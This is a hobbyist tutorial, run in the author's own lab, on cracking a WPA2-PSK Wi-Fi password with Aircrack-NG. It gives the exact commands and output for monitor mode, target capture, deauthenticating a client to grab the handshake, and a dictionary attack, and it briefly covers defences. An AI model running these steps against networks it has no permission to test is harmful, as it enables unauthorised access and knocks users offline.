Hey there :) Well, time to have a little fun with WPA2-PSK cracking, using the Aircrack-NG suite of tools. here I'm using a Kali host, but you can use anything you like. But, not Windows, it's usually not good for anything cracking related :)
Okay, ready ? , So strap yourself in, and let's go joyriding in Wifi-Land
You will need an Access Point set up for WPA2-PSK. Since most people have that (No WEP right ?!), that should be taken care of. If it's not, go consult your ISP docs, switch you AP to WPA2-PSK, and come back again :)
You will also need two machines, one attacker, and one client. As I said, my attacker is a Kali host, my client is an ordinary tablet, it's not important. As long as it can send a request to join the network, it's good enough, and a wifi card, capable of injection / suitable for Aircrack-ng. It has to be able to run monitor mode, as we will need it to capture packets.
The first thing we need, is trying to see if we can find a network. Let's play around with airmon-ng for that. Since we don't know what AP / network we'll be targeting, let's have a look around. Start the wifi card in monitor mode, with the command
airmon-ng start wlan0Here wlan0 is my card, found by running a quick ifconfig command.
The output you'll see, looks like this.
Found 4 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
1232 avahi-daemon
1239 avahi-daemon
7001 wpa_supplicant
8586 NetworkManager
PHY Interface Driver Chipset
phy1 wlan0 rtl8192cu Realtek Semiconductor Corp. RTL8188CUS 802.11n WLAN Adapter
(mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
(mac80211 station mode vif disabled for [phy1]wlan0)
Note it says it found four processes that can cause trouble. We could kill them off with pskill <process>, but we'll let them run for now.
Also note that it made a new wifi card, namely wlan0mon. Let's see if that's true. Run ifconfig
wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec 00-13-EF-F1-03-69-30-3A-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 10510 bytes 2570977 (2.4 MiB)
RX errors 0 dropped 10510 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
If it did, you should see something like this in your ifconfig output. If you have that, let's go ahead, and see if we can find a wifi network.
For that we use airodump-ng, with the command
airodump-ng wlan0monThat command, will give you an output that looks something like this. Please note, this is edited a bit :)
CH 2 ][ Elapsed: 1 min ][ 2020-04-04 16:06 ][ WPA handshake: 30:91:8F:F8:41:9D
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
50:6A:03:DF:5C:EC -1 0 0 0 13 -1 <length: 0>
00:23:69:2F:6B:F5 -56 254 76 0 11 54 WPA CCMP PSK linksys
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) 6C:88:14:AE:31:5C -65 0 - 1 0 11 some_host
(not associated) DA:A1:19:68:CB:A2 -67 0 - 1 0 5 The important thing to notice is that CH field will drift, because airodump-ng switches channels, it "hops" to get the widest coverage possible. For now that's okay, since we're just doing recon, not actively attacking.
The BSSID, is the routers MAC, That will come into play a bit later, when we're fine-tuning for the attack. Note under ESSID, we have a hidden network <lenght: 0>, and we have my target test network linksys.
We also have channel output (CH), Data (Data), Encryption (ENC), Cipher (CIPHER), and finally Auth (AUTH). The auth is important. It have to be PSK, since we're attacking a network running preshared-key. Most networks do. The other type is Radius, (WPA-Enterprise), that is for another tutorial, let's keep it simple :)
So, now we have to fine-tune out network sniffer, let's see what the help function have to say about what we can do. Remember we have to use a couple of parameters. BSSID, ESSID, and Channel.
Consult the help for airodump-ng with
airodump-ng -HIt should tell you, that we need a couple of switches. We can flter on BSSID (Router MAC), OR ESSID (Network name). Mine's 00:23:69:2F:6B:F5 and "linksys".
To set the ESSID, we need the --essid switch, and we need the channel set to be 11, with the --channel switch. We also need to write a dumpfile, that's the --write switch and last, the interface name, that's wlan0mon for me.
The entire command would be something like this
airodump-ng --essid linksys --channel 11 --write linksysdump.pcap wlan0monAfter that, you output should be something like this
CH 11 ][ Elapsed: 18 s ][ 2020-04-04 16:26
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:23:69:2F:6B:F5 -41 93 152 9 0 11 54 WPA CCMP PSK linksys
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) 44:91:60:4C:AC:CA -77 0 - 1 0 1 The next thing we need to hunt for, is connected clients. They should appear under BSSID and STATION. Here's my laptop
CH 11 ][ Elapsed: 55 s ][ 2020-04-04 16:38
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:23:69:2F:6B:F5 -47 100 447 55 0 11 54 WPA CCMP PSK linksys
BSSID STATION PWR Rate Lost Frames Notes Probes
00:23:69:2F:6B:F5 2C:FD:AB:E0:0D:AB -27 1 - 6 0 38
00:23:69:2F:6B:F5 7C:7A:91:E4:1F:F1 -29 1 - 2e 0 10 My laptop would be 7C:7A:91:E4:1F:F1. We need to remember that, since we'll use it in a minute. To get the key material, we need to kick it off the network, and we do that with Aireplay-ng.
If we have a look at aireplay-ng, using the -H switch we get this :) Please note that output is shortened down for readability.
Aireplay-ng 1.6 - (C) 2006-2020 Thomas d'Otreppe
https://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet
Fakeauth attack options:
-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time
Arp Replay attack options:
-j : inject FromDS packets
Fragmentation attack options:
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
Test attack options:
-B : activates the bitrate test
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
Miscellaneous options:
-R : disable /dev/rtc usage
--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211
--deauth-rc rc : Deauthentication reason code [0-254] (Default: 7)
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
--help : Displays this usage screen
So, it seems if we run
aireplay-ng --deauth 5 -a 00:23:69:2F:6B:F5 -d 7C:7A:91:E4:1F:F1 wlan0monit should do the trick, knocking off my laptop, forcing it to reconnect, and in the process, send us a handshake :)
aireplay-ng --deauth 5 -a 00:23:69:2F:6B:F5 -d 7C:7A:91:E4:1F:F1 wlan0mon
16:52:35 Waiting for beacon frame (BSSID: 00:23:69:2F:6B:F5) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
16:52:36 Sending DeAuth (code 7) to broadcast -- BSSID: [00:23:69:2F:6B:F5]
16:52:36 Sending DeAuth (code 7) to broadcast -- BSSID: [00:23:69:2F:6B:F5]
16:52:37 Sending DeAuth (code 7) to broadcast -- BSSID: [00:23:69:2F:6B:F5]
16:52:37 Sending DeAuth (code 7) to broadcast -- BSSID: [00:23:69:2F:6B:F5]
16:52:37 Sending DeAuth (code 7) to broadcast -- BSSID: [00:23:69:2F:6B:F5]
And, with that, the laptop disconnects, and wan't to authenticate again, retransmitting the handshake. Remember, deauth have to be done from another terminal, to let airodump-ng run to capture the handshake :)
When it does, you airodump-ng windows, will show that it captured a handshake, like this
CH 11 ][ Elapsed: 6 s ][ 2020-04-04 16:59 ][ WPA handshake: 00:23:69:2F:6B:F5
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:23:69:2F:6B:F5 -42 100 52 19 8 11 54 WPA CCMP PSK linksys
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) 34:E1:2D:81:A5:01 -59 0 - 1 6 3
00:23:69:2F:6B:F5 7C:7A:91:E4:1F:F1 -33 54 - 1 3 21 PMKID linksysNow, for the final part, let's get cracking on that handshake file. A note here. We can't crack the handshake file with a password attack, if the password's NOT in the dictionary. It have to be.
We could do a bruteforce attack, if we have enough computer power, but since that's not really an option, due to the cost of building a WPA cracking cluster, let's forget that option.
For a simple test, I made a password file, with the right password as one of the options, just to demonstrate the concept.
A capture file, would be named something like somefilename.cap. Let's feed it to aircrack-ng, and see if we can crack this thing :)
For that we need the -e switch, set to the network name, and we need a dictionary file set with the -w option, and the capfile. So let's try this. My command is this, yours will be a bit different.
aircrack-ng -e linksys -w passwd.lst linksysdump.pcap-02.capSome times, it will throw a "Key not found" error, because the handshake / capture file is not clean, so run it thorugh wpaclean first to be sure.
wpaclean essid_clean.cap unclean_dump_file.cap
After cleaning, run the cracker. mine runs in a couple of seconds, because there's only the right password in the file for the cracker to try out. Here's the output
Aircrack-ng 1.6
[00:00:00] 1/1 keys tested (30.05 k/s)
Time left: --
KEY FOUND! [ cznyqXXXXX ]
Master Key : CE CA 1D 67 86 23 66 C4 FB 2B A2 2C E1 11 CF 90
F7 D6 06 07 45 51 F6 35 F3 BC 5C F5 6B 69 E9 31
Transient Key : 80 69 13 B1 BE DB 0B 44 19 9C 5D 02 3F 89 F4 EC
85 B3 5B C1 A0 53 40 3C 74 F4 CB 53 E4 F8 8F 54
41 73 FE CD E2 E5 BF A4 DA 60 23 A2 FC B9 A8 65
95 79 51 3A 33 42 DE E8 89 EB 88 1F 31 E8 6E 24
EAPOL HMAC : A2 CE 8E 57 41 03 3A 2A 54 DA 7A E5 F7 2A F2 34
Basically, that's all there's to it. It's pretty straightforward to do. But, can we stop this from happening ?
Yes, using a good password, that's not so easy to guess. For that, go read my thoughts on the subject in Wifi security.
We could also enable Protected-Management-Frames on our Access Point. That would stop an attacker from kicking us off the network, and getting a handshake file.
There are other strategies for that, namely the "False-Access-Point" attack, where an attacker forces a client to connect to a duplicate access point, using raw transmitting power, to override the default AP.
This was just a very basic intro to Wifi cracking WPA style. There are other tools and techniques out there for the lazy ones and I'll try to cover those in another article.
But for now, hit the books, hit Google and get smarter on Wifi Cracking, there's so much more to be learned, the journey's just beginning.
Have fun, and pleeease, stay off your neighbours Wifi :)